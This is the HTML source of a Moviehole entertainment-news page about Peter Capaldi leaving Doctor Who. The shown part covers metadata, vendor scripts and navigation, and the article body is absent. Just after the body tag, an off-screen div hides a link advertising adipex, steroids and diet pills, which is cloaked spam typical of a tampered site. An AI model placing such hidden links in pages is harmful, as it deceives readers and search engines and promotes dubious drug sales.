<!doctype html >
<!--[if IE 8]>    <html class="ie8" lang="en"> <![endif]-->
<!--[if IE 9]>    <html class="ie9" lang="en"> <![endif]-->
<!--[if gt IE 8]><!--> <html lang="en-US" prefix="og: http://ogp.me/ns#"> <!--<![endif]-->
<head>
    <title>Peter Capaldi is leaving Doctor Who - Moviehole</title>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="pingback" href="http://moviehole.net/xmlrpc.php" />
    <meta property="og:image" content="http://moviehole.net/img/drwho2.jpg" /><meta name="author" content="Tawnee TV">
<link rel="icon" type="image/png" href="http://moviehole.net/img/favicon.png">
<!-- This site is optimized with the Yoast SEO plugin v4.1 - https://yoast.com/wordpress/plugins/seo/ -->
<link rel="canonical" href="http://moviehole.net/2017112380peter-capaldi-leaving-doctor" />
<meta property="og:locale" content="en_US" />
<meta property="og:type" content="article" />
<meta property="og:title" content="Peter Capaldi is leaving Doctor Who - Moviehole" />
<meta property="og:description" content="Peter Capaldi has announced he&#8217;ll be stepping down as Doctor Who in twelve months. Capaldi first stepped into the TARDIS in 2013, and will leave the iconic role in the 2017 Christmas special after three incredible seasons on BBC AMERICA&#8217;s hit sci-fi drama. The announcement came tonight on Jo Whiley&#8217;s BBC Radio 2 show; speaking &hellip;" />
<meta property="og:url" content="http://moviehole.net/2017112380peter-capaldi-leaving-doctor" />
<meta property="og:site_name" content="Moviehole" />
<meta property="article:tag" content="Doctor Who" />
<meta property="article:tag" content="TV" />
<meta property="article:section" content="Movie News" />
<meta property="article:published_time" content="2017-01-31T10:04:09+00:00" />
<meta property="og:image" content="http://moviehole.net/img/drwho2.jpg" />
<meta property="og:image:width" content="620" />
<meta property="og:image:height" content="400" />
<meta name="twitter:card" content="summary" />
<meta name="twitter:description" content="Peter Capaldi has announced he&#8217;ll be stepping down as Doctor Who in twelve months. Capaldi first stepped into the TARDIS in 2013, and will leave the iconic role in the 2017 Christmas special after three incredible seasons on BBC AMERICA&#8217;s hit sci-fi drama. The announcement came tonight on Jo Whiley&#8217;s BBC Radio 2 show; speaking [&hellip;]" />
<meta name="twitter:title" content="Peter Capaldi is leaving Doctor Who - Moviehole" />
<meta name="twitter:image" content="http://moviehole.net/img/drwho2.jpg" />
<!-- / Yoast SEO plugin. -->

<link rel='dns-prefetch' href='//s0.wp.com' />
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="Moviehole &raquo; Feed" href="http://moviehole.net/feed" />
<link rel="alternate" type="application/rss+xml" title="Moviehole &raquo; Comments Feed" href="http://moviehole.net/comments/feed" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/moviehole.net\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.2"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='mmm_mega_main_menu-css'  href='http://moviehole.net/wp-content/plugins/mega_main_menu/src/css/cache.skin.css?ver=1431223570' type='text/css' media='all' />
<link rel='stylesheet' id='contact-form-7-css'  href='http://moviehole.net/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=4.6' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_open_sans-css'  href='http://fonts.googleapis.com/css?family=Open+Sans%3A300italic%2C400italic%2C600italic%2C400%2C600%2C700&#038;ver=4.7.2' type='text/css' media='all' />
<link rel='stylesheet' id='google_font_roboto-css'  href='http://fonts.googleapis.com/css?family=Roboto%3A500%2C400italic%2C700%2C900%2C500italic%2C400%2C300&#038;ver=4.7.2' type='text/css' media='all' />
<link rel='stylesheet' id='google-fonts-style-css'  href='http://fonts.googleapis.com/css?family=Abril+Fatface%3A400%2C700%7CLato%3A400%2C700&#038;ver=4.7.2' type='text/css' media='all' />
<link rel='stylesheet' id='mm_icomoon-css'  href='http://moviehole.net/wp-content/plugins/mega_main_menu/src/css/external/icomoon.css?ver=2.0.2' type='text/css' media='all' />
<link rel='stylesheet' id='mm_font-awesome-css'  href='http://moviehole.net/wp-content/plugins/mega_main_menu/src/css/external/font-awesome.css?ver=2.0.2' type='text/css' media='all' />
<link rel='stylesheet' id='js_composer_front-css'  href='http://moviehole.net/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.11.2' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-css'  href='http://moviehole.net/wp-content/themes/Newspaper/style.css?ver=7.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='td-theme-demo-style-css'  href='http://moviehole.net/wp-content/themes/Newspaper/includes/demos/medicine/demo_style.css?ver=7.0.1' type='text/css' media='all' />
<link rel='stylesheet' id='social-logos-css'  href='http://moviehole.net/wp-content/plugins/jetpack/_inc/social-logos/social-logos.min.css?ver=1' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack_css-css'  href='http://moviehole.net/wp-content/plugins/jetpack/css/jetpack.css?ver=4.5' type='text/css' media='all' />
<script type='text/javascript' src='http://moviehole.net/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://moviehole.net/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://moviehole.net/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.5.0'></script>
<link rel='https://api.w.org/' href='http://moviehole.net/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://moviehole.net/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://moviehole.net/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.7.2" />
<link rel='shortlink' href='http://moviehole.net/?p=112380' />
<link rel="alternate" type="application/json+oembed" href="http://moviehole.net/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fmoviehole.net%2F2017112380peter-capaldi-leaving-doctor" />
<link rel="alternate" type="text/xml+oembed" href="http://moviehole.net/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fmoviehole.net%2F2017112380peter-capaldi-leaving-doctor&#038;format=xml" />
<script data-cfasync="false" src="//load.sumome.com/" data-sumo-platform="wordpress" data-sumo-site-id="5aacdef5bfddd5beb83b7a5d7767791b7b2cc57ddd1dfd5a7a69de0d5030e03e" async></script><script type="text/javascript">
(function(url){
	if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
	var addEvent = function(evt, handler) {
		if (window.addEventListener) {
			document.addEventListener(evt, handler, false);
		} else if (window.attachEvent) {
			document.attachEvent('on' + evt, handler);
		}
	};
	var removeEvent = function(evt, handler) {
		if (window.removeEventListener) {
			document.removeEventListener(evt, handler, false);
		} else if (window.detachEvent) {
			document.detachEvent('on' + evt, handler);
		}
	};
	var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' ');
	var logHuman = function() {
		var wfscr = document.createElement('script');
		wfscr.type = 'text/javascript';
		wfscr.async = true;
		wfscr.src = url + '&r=' + Math.random();
		(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
		for (var i = 0; i < evts.length; i++) {
			removeEvent(evts[i], logHuman);
		}
	};
	for (var i = 0; i < evts.length; i++) {
		addEvent(evts[i], logHuman);
	}
})('//moviehole.net/?wordfence_logHuman=1&hid=ACE13E7184D39EBA05C1959105B9A553');
</script><style type='text/css'>img#wpstats{display:none}</style><!--[if lt IE 9]><script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
    <meta name="generator" content="Powered by Visual Composer - drag and drop page builder for WordPress."/>
<!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="http://moviehole.net/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><!--[if IE  8]><link rel="stylesheet" type="text/css" href="http://moviehole.net/wp-content/plugins/js_composer/assets/css/vc-ie8.min.css" media="screen"><![endif]-->
<!-- JS generated by theme -->

<script>
    
    

	    var tdBlocksArray = []; //here we store all the items for the current page

	    //td_block class - each ajax block uses a object of this class for requests
	    function tdBlock() {
		    this.id = '';
		    this.block_type = 1; //block type id (1-234 etc)
		    this.atts = '';
		    this.td_column_number = '';
		    this.td_current_page = 1; //
		    this.post_count = 0; //from wp
		    this.found_posts = 0; //from wp
		    this.max_num_pages = 0; //from wp
		    this.td_filter_value = ''; //current live filter value
		    this.is_ajax_running = false;
		    this.td_user_action = ''; // load more or infinite loader (used by the animation)
		    this.header_color = '';
		    this.ajax_pagination_infinite_stop = ''; //show load more at page x
	    }


        // td_js_generator - mini detector
        (function(){
            var htmlTag = document.getElementsByTagName("html")[0];

            if ( navigator.userAgent.indexOf("MSIE 10.0") > -1 ) {
                htmlTag.className += ' ie10';
            }

            if ( !!navigator.userAgent.match(/Trident.*rv\:11\./) ) {
                htmlTag.className += ' ie11';
            }

            if ( /(iPad|iPhone|iPod)/g.test(navigator.userAgent) ) {
                htmlTag.className += ' td-md-is-ios';
            }

            var user_agent = navigator.userAgent.toLowerCase();
            if ( user_agent.indexOf("android") > -1 ) {
                htmlTag.className += ' td-md-is-android';
            }

            if ( -1 !== navigator.userAgent.indexOf('Mac OS X')  ) {
                htmlTag.className += ' td-md-is-os-x';
            }

            if ( /chrom(e|ium)/.test(navigator.userAgent.toLowerCase()) ) {
               htmlTag.className += ' td-md-is-chrome';
            }

            if ( -1 !== navigator.userAgent.indexOf('Firefox') ) {
                htmlTag.className += ' td-md-is-firefox';
            }

            if ( -1 !== navigator.userAgent.indexOf('Safari') && -1 === navigator.userAgent.indexOf('Chrome') ) {
                htmlTag.className += ' td-md-is-safari';
            }

        })();




        var tdLocalCache = {};

        ( function () {
            "use strict";

            tdLocalCache = {
                data: {},
                remove: function (resource_id) {
                    delete tdLocalCache.data[resource_id];
                },
                exist: function (resource_id) {
                    return tdLocalCache.data.hasOwnProperty(resource_id) && tdLocalCache.data[resource_id] !== null;
                },
                get: function (resource_id) {
                    return tdLocalCache.data[resource_id];
                },
                set: function (resource_id, cachedData) {
                    tdLocalCache.remove(resource_id);
                    tdLocalCache.data[resource_id] = cachedData;
                }
            };
        })();

    
    
var tds_login_sing_in_widget="show";
var td_viewport_interval_list=[{"limitBottom":767,"sidebarWidth":228},{"limitBottom":1018,"sidebarWidth":300},{"limitBottom":1140,"sidebarWidth":324}];
var td_animation_stack_effect="type0";
var tds_animation_stack=true;
var td_animation_stack_specific_selectors=".entry-thumb, img";
var td_animation_stack_general_selectors=".td-animation-stack img, .post img";
var td_ajax_url="http:\/\/moviehole.net\/wp-admin\/admin-ajax.php?td_theme_name=Newspaper&v=7.0.1";
var td_get_template_directory_uri="http:\/\/moviehole.net\/wp-content\/themes\/Newspaper";
var tds_snap_menu="";
var tds_logo_on_sticky="show";
var tds_header_style="3";
var td_please_wait="Please wait...";
var td_email_user_pass_incorrect="User or password incorrect!";
var td_email_user_incorrect="Email or username incorrect!";
var td_email_incorrect="Email incorrect!";
var tds_more_articles_on_post_enable="";
var tds_more_articles_on_post_time_to_wait="";
var tds_more_articles_on_post_pages_distance_from_top=0;
var tds_theme_color_site_wide="#376a91";
var tds_smart_sidebar="enabled";
var tdThemeName="Newspaper";
var td_magnific_popup_translation_tPrev="Previous (Left arrow key)";
var td_magnific_popup_translation_tNext="Next (Right arrow key)";
var td_magnific_popup_translation_tCounter="%curr% of %total%";
var td_magnific_popup_translation_ajax_tError="The content from %url% could not be loaded.";
var td_magnific_popup_translation_image_tError="The image #%curr% could not be loaded.";
var td_ad_background_click_link="";
var td_ad_background_click_target="";
</script>


<!-- Header style compiled by theme -->

<style>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</style>


<!--[if gte IE 9]>
	<style type="text/css">
		.#mega_main_menu,
		.#mega_main_menu *
		{
			filter: none;
		}
	</style>
<![endif]-->
<link rel="icon" href="http://moviehole.net/img/cropped-MH-LOGO-2016-32x32.png" sizes="32x32" />
<link rel="icon" href="http://moviehole.net/img/cropped-MH-LOGO-2016-192x192.png" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="http://moviehole.net/img/cropped-MH-LOGO-2016-180x180.png" />
<meta name="msapplication-TileImage" content="http://moviehole.net/img/cropped-MH-LOGO-2016-270x270.png" />
<!-- Google Analytics Tracking by Google Analyticator 6.5.0: http://www.videousermanuals.com/google-analyticator/ -->
<script type="text/javascript">
    var analyticsFileTypes = [''];
    var analyticsSnippet = 'disabled';
    var analyticsEventTracking = 'enabled';
</script>
<script type="text/javascript">
	(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
	})(window,document,'script','//www.google-analytics.com/analytics.js','ga');
	ga('create', 'UA-18198727-1', 'auto');
 
	ga('send', 'pageview');
</script>
<noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><script type="text/javascript">
// Add Global Lightbox Settings for VC Extensions
var $TS_VCSC_Lightbox_Thumbs = "bottom";
var $TS_VCSC_Lightbox_Thumbsize = 50;
var $TS_VCSC_Lightbox_Animation = "random";
var $TS_VCSC_Lightbox_Captions = "data-title";
var $TS_VCSC_Lightbox_Durations = 5000;
var $TS_VCSC_Lightbox_Share = true;
var $TS_VCSC_Lightbox_Social = "fb,tw,gp,pin";
var $TS_VCSC_Lightbox_NoTouch = false;
var $TS_VCSC_Lightbox_BGClose = true;
var $TS_VCSC_Lightbox_NoHashes = true;
var $TS_VCSC_Lightbox_Keyboard = true;
var $TS_VCSC_Lightbox_FullScreen = true;
var $TS_VCSC_Lightbox_Zoom = true;
var $TS_VCSC_Lightbox_FXSpeed = 300;
var $TS_VCSC_Lightbox_Scheme = "dark";
var $TS_VCSC_Lightbox_Backlight = "#ffffff";
var $TS_VCSC_Lightbox_UseColor = false;
</script>
</head>

<body class="post-template-default single single-post postid-112380 single-format-standard mmm mega_main_menu-2-0-2 peter-capaldi-leaving-doctor td-medicine wpb-js-composer js-comp-ver-4.11.2 vc_responsive td-animation-stack-type0 td-boxed-layout" itemscope="itemscope" itemtype="http://schema.org/WebPage"><div style="position: absolute; bottom: 0px; left: -1101px;">Legally site to buy steroids and diet pills drugs <a title="buy adipex Online" href="https://buyadipexnow.com/" target="_blank" hreflang="en-US" >buy adipex</a> in USA legal and CHEAP.</div>

        <div class="td-scroll-up"><i class="td-icon-menu-up"></i></div>
    
    <div class="td-menu-background"></div>
<div id="td-mobile-nav">
    <div class="td-mobile-container">
        <!-- mobile menu top section -->
        <div class="td-menu-socials-wrap">
            <!-- socials -->
            <div class="td-menu-socials">
                
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.facebook.com/moviehole" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="moviehole" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://instagram.com/moviehole" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://http//WWW.pinterest.com/moviehole" title="Pinterest">
                <i class="td-icon-font td-icon-pinterest"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.twitter.com/moviehole" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span>            </div>
            <!-- close button -->
            <div class="td-mobile-close">
                <a href="#"><i class="td-icon-close-mobile"></i></a>
            </div>
        </div>

        <!-- login section -->
                    <div class="td-menu-login-section">
                
    <div class="td-guest-wrap">
        <div class="td-menu-avatar"><div class="td-avatar-container"><img alt='' src='http://1.gravatar.com/avatar/?s=80&#038;d=mm&#038;r=g' srcset='http://1.gravatar.com/avatar/?s=160&amp;d=mm&amp;r=g 2x' class='avatar avatar-80 photo avatar-default' height='80' width='80' /></div></div>
        <div class="td-menu-login"><a id="login-link-mob">Sign in</a></div>
    </div>
            </div>
        
        <!-- menu section -->
        <div class="td-mobile-content">
            <div class="menu-movieholemain-container"><ul id="menu-movieholemain" class="td-mobile-main-menu"><li id="menu-item-100131" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first menu-item-100131"><a href="http://moviehole.net/">Home</a></li>
<li id="menu-item-58984" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-58984"><a title="News" href="http://moviehole.net/category/news">News</a></li>
<li id="menu-item-71596" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-71596"><a href="http://moviehole.net/category/tv-2">TV<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-83539" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-83539"><a href="http://moviehole.net/category/streamingtv">Streaming</a></li>
</ul>
</li>
<li id="menu-item-71477" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-71477"><a href="http://moviehole.net/category/cinema">Cinema Reviews</a></li>
<li id="menu-item-58987" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-58987"><a href="http://moviehole.net/category/interviews">Interviews<i class="td-icon-menu-right td-element-after"></i></a>
<ul class="sub-menu">
	<li id="menu-item-54938" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-54938"><a href="http://moviehole.net/category/a-mandy-moment">Mandy</a></li>
</ul>
</li>
<li id="menu-item-70405" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-70405"><a href="http://moviehole.net/category/movie-trailers">Trailers</a></li>
<li id="menu-item-71478" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-71478"><a href="http://moviehole.net/category/disc">VOD/DVD</a></li>
<li id="menu-item-54590" class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-54590"><a href="http://moviehole.net/category/giveaways">Giveaways</a></li>
<li id="menu-item-74081" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-74081"><a href="http://moviehole.net/tag/vod">VOD Views</a></li>
</ul></div>        </div>
    </div>

    <!-- register/login section -->
            <div id="login-form-mobile" class="td-register-section">
            
            <div id="td-login-mob" class="td-login-animation td-login-hide-mob">
            	<!-- close button -->
	            <div class="td-login-close">
	                <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
	                <div class="td-login-title">Sign in</div>
	                <!-- close button -->
		            <div class="td-mobile-close">
		                <a href="#"><i class="td-icon-close-mobile"></i></a>
		            </div>
	            </div>
	            <div class="td-login-form-wrap">
	                <div class="td-login-panel-title"><span>Welcome!</span>Log into your account</div>
	                <div class="td_display_err"></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="text" name="login_email" id="login_email-mob" value="" required><label>your username</label></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="password" name="login_pass" id="login_pass-mob" value="" required><label>your password</label></div>
	                <input type="button" name="login_button" id="login_button-mob" class="td-login-button" value="LOG IN">
	                <div class="td-login-info-text"><a href="#" id="forgot-pass-link-mob">Forgot your password?</a></div>
                </div>
            </div>

            

            <div id="td-forgot-pass-mob" class="td-login-animation td-login-hide-mob">
                <!-- close button -->
	            <div class="td-forgot-pass-close">
	                <a href="#" class="td-back-button"><i class="td-icon-read-down"></i></a>
	                <div class="td-login-title">Password recovery</div>
	            </div>
	            <div class="td-login-form-wrap">
	                <div class="td-login-panel-title">Recover your password</div>
	                <div class="td_display_err"></div>
	                <div class="td-login-inputs"><input class="td-login-input" type="text" name="forgot_email" id="forgot_email-mob" value="" required><label>your email</label></div>
	                <input type="button" name="forgot_button" id="forgot_button-mob" class="td-login-button" value="Send My Pass">
                </div>
            </div>
        </div>
    </div>    <div class="td-search-background"></div>
<div class="td-search-wrap-mob">
	<div class="td-drop-down-search" aria-labelledby="td-header-search-button">
		<form method="get" class="td-search-form" action="http://moviehole.net/">
			<!-- close button -->
			<div class="td-search-close">
				<a href="#"><i class="td-icon-close-mobile"></i></a>
			</div>
			<div role="search" class="td-search-input">
				<span>Search</span>
				<input id="td-header-search-mob" type="text" value="" name="s" autocomplete="off" />
			</div>
		</form>
		<div id="td-aj-search-mob"></div>
	</div>
</div>    
    
    <div id="td-outer-wrap">
    
        <!--
Header style 3
-->

<div class="td-header-wrap td-header-style-3">

    <div class="td-header-top-menu-full">
        <div class="td-container td-header-row td-header-top-menu">
            
    <div class="top-bar-style-1">
        
<div class="td-header-sp-top-menu">


	        <div class="td_data_time">
            <div >

                Tuesday, January 31, 2017
            </div>
        </div>
    <ul class="top-header-menu td_ul_login"><li class="menu-item"><a class="td-login-modal-js menu-item" href="#login-form" data-effect="mpf-td-login-effect">Sign in / Join</a><span class="td-sp-ico-login td_sp_login_ico_style"></span></li></ul><div class="menu-top-container"><ul id="menu-top-menu" class="top-header-menu"><li id="menu-item-97172" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-97172"><a href="http://moviehole.net/td_d_slug_15">Contact us</a></li>
</ul></div></div>
        <div class="td-header-sp-top-widget">
    
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.facebook.com/moviehole" title="Facebook">
                <i class="td-icon-font td-icon-facebook"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="moviehole" title="Google+">
                <i class="td-icon-font td-icon-googleplus"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://instagram.com/moviehole" title="Instagram">
                <i class="td-icon-font td-icon-instagram"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://http//WWW.pinterest.com/moviehole" title="Pinterest">
                <i class="td-icon-font td-icon-pinterest"></i>
            </a>
        </span>
        <span class="td-social-icon-wrap">
            <a target="_blank" href="http://www.twitter.com/moviehole" title="Twitter">
                <i class="td-icon-font td-icon-twitter"></i>
            </a>
        </span></div>
    </div>

<!-- LOGIN MODAL -->

                <div  id="login-form" class="white-popup-block mfp-hide mfp-with-anim">
                    <ul class="td-login-tabs">
                        <li><a id="login-link" class="td_login_tab_focus">LOG IN</a></li>
                    </ul>



                    <div class="td-login-wrap">
                        <div class="td_display_err"></div>

                        <div id="td-login-div" class="">
                            <div class="td-login-panel-title">Welcome! Log into your account</div>
                            <input class="td-login-input" type="text" name="login_email" id="login_email" placeholder="your username" value="" required>
                            <input class="td-login-input" type="password" name="login_pass" id="login_pass" value="" placeholder="your password" required>
                            <input type="button" name="login_button" id="login_button" class="wpb_button btn td-login-button" value="Log In">


                            <div class="td-login-info-text"><a href="#" id="forgot-pass-link">Forgot your password?</a></div>


                        </div>

                        

                         <div id="td-forgot-pass-div" class="td-display-none">
                            <div class="td-login-panel-title">Recover your password</div>
                            <input class="td-login-input" type="text" name="forgot_email" id="forgot_email" placeholder="your email" value="" required>
                            <input type="button" name="forgot_button" id="forgot_button" class="wpb_button btn td-login-button" value="Send My Pass">
                        </div>




                    </div>
                </div>
                        </div>
    </div>

    <div class="td-banner-wrap-full">
        <div class="td-container td-header-row td-header-header">
            <div class="td-header-sp-logo">
                            <a class="td-main-logo" href="http://moviehole.net/">
                <img src="http://moviehole.net/img/logomoviehole-700x295.png" alt=""/>
                <span class="td-visual-hidden">Moviehole</span>
            </a>
                    </div>
            <div class="td-header-sp-recs">
                <div class="td-header-rec-wrap">
    
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-header">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:728px;height:90px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="2150934400"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="2150934400"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:468px;height:60px" data-ad-client="ca-pub-4719146971986307" data-ad-slot="2150934400"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 


</div>            </div>
        </div>
    </div>

    <div class="td-header-menu-wrap-full">
        <div class="td-header-menu-wrap">
            <div class="td-container td-header-row td-header-main-menu black-menu">
                <div id="td-header-menu" role="navigation">
    <div id="td-top-mobile-toggle"><a href="#"><i class="td-icon-font td-icon-mobile"></i></a></div>
    <div class="td-main-menu-logo td-logo-in-header">
        		<a class="td-mobile-logo td-sticky-mobile" href="http://moviehole.net/">
			<img class="td-retina-data" data-retina="http://moviehole.net/img/cropsmall.png" src="http://moviehole.net/img/cropsmall.png" alt=""/>
		</a>
			<a class="td-header-logo td-sticky-mobile" href="http://moviehole.net/">
			<img src="http://moviehole.net/img/logomoviehole-700x295.png" alt=""/>
		</a>
	    </div>
    <div class="menu-movieholemain-container"><ul id="menu-movieholemain-1" class="sf-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-first td-menu-item td-normal-menu menu-item-100131"><a href="http://moviehole.net/">Home</a></li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent td-menu-item td-normal-menu menu-item-58984"><a title="News" href="http://moviehole.net/category/news">News</a></li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children td-menu-item td-normal-menu menu-item-71596"><a href="http://moviehole.net/category/tv-2">TV</a>
<ul class="sub-menu">
	<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-83539"><a href="http://moviehole.net/category/streamingtv">Streaming</a></li>
</ul>
</li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-71477"><a href="http://moviehole.net/category/cinema">Cinema Reviews</a></li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children td-menu-item td-normal-menu menu-item-58987"><a href="http://moviehole.net/category/interviews">Interviews</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-54938"><a href="http://moviehole.net/category/a-mandy-moment">Mandy</a></li>
</ul>
</li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-70405"><a href="http://moviehole.net/category/movie-trailers">Trailers</a></li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-71478"><a href="http://moviehole.net/category/disc">VOD/DVD</a></li>
<li class="mega-dropdown menu-item menu-item-type-taxonomy menu-item-object-category td-menu-item td-normal-menu menu-item-54590"><a href="http://moviehole.net/category/giveaways">Giveaways</a></li>
